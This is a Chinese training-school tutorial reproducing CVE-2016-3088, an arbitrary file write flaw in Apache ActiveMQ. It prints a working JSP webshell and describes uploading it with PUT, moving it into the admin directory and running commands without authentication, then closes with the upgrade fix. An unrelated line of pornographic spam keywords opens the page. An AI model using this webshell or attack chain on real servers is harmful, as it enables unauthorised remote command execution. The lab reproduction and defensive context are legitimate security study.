欧美成人午夜免费全部完,亚洲午夜福利精品久久,а√最新版在线天堂,另类亚洲综合区图片小说区,亚洲欧美日韩精品色xxx

千鋒扣丁學堂Linux培訓之Apache ActiveMQ任意文件寫入漏洞復(fù)現(xiàn)

2019-08-07 15:25:27 4735瀏覽

今天千鋒扣丁學堂Linux培訓老師給大家分享一篇關(guān)于介紹了Apache ActiveMQ任意文件寫入漏洞（CVE-2016-3088）復(fù)現(xiàn)的詳細介紹，下面我們一起來看一下吧。

一、漏洞描述

該漏洞出現(xiàn)在fileserver應(yīng)用中,漏洞原理:ActiveMQ中的fileserver服務(wù)允許用戶通過HTTPPUT方法上傳文件到指定目錄。Fileserver支持寫入文件(不解析jsp),但是支持移動文件(Move)我們可以將jsp的文件PUT到Fileserver下,然后再通過Move指令移動到可執(zhí)行目錄下訪問。

二、漏洞影響版本

Apache ActiveMQ 5.0.0 - 5.13.2

三、漏洞環(huán)境搭建

1、官網(wǎng)下載apache-activemq-5.7.0-bin.tar下載地址:http://activemq.apache.org/download-archives.html

2、解壓

3、啟動,進入bin目錄下,運行./activemqstart

4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境

四、漏洞復(fù)現(xiàn)

1、PUT上傳一個jsp的webshell到fileserver目錄,下圖可以看到成功上傳jsp文件

Jsp文件內(nèi)容:

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限

3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑

4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄

5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令

五、漏洞防御

ActiveMQFileserver的功能在5.14.0及其以后的版本中已被移除。建議用戶升級至5.14.0及其以后版本。

以上就是關(guān)于千鋒扣丁學堂Linux培訓之Apache ActiveMQ任意文件寫入漏洞（CVE-2016-3088）復(fù)現(xiàn)的全部內(nèi)容，想要了解更多關(guān)于Linux開發(fā)方面內(nèi)容的小伙伴，請關(guān)注扣丁學堂Linux培訓官網(wǎng)、微信等平臺，扣丁學堂IT職業(yè)在線學習教育有專業(yè)的Linux講師為您指導(dǎo)，此外扣丁學堂老師精心推出的Linux視頻教程定能讓你快速掌握Linux從入門到精通開發(fā)實戰(zhàn)技能。扣丁學堂Linux技術(shù)交流群：422345477。

                          

      【關(guān)注微信公眾號獲取更多學習資料】         【掃碼進入Python全棧開發(fā)免費公開課】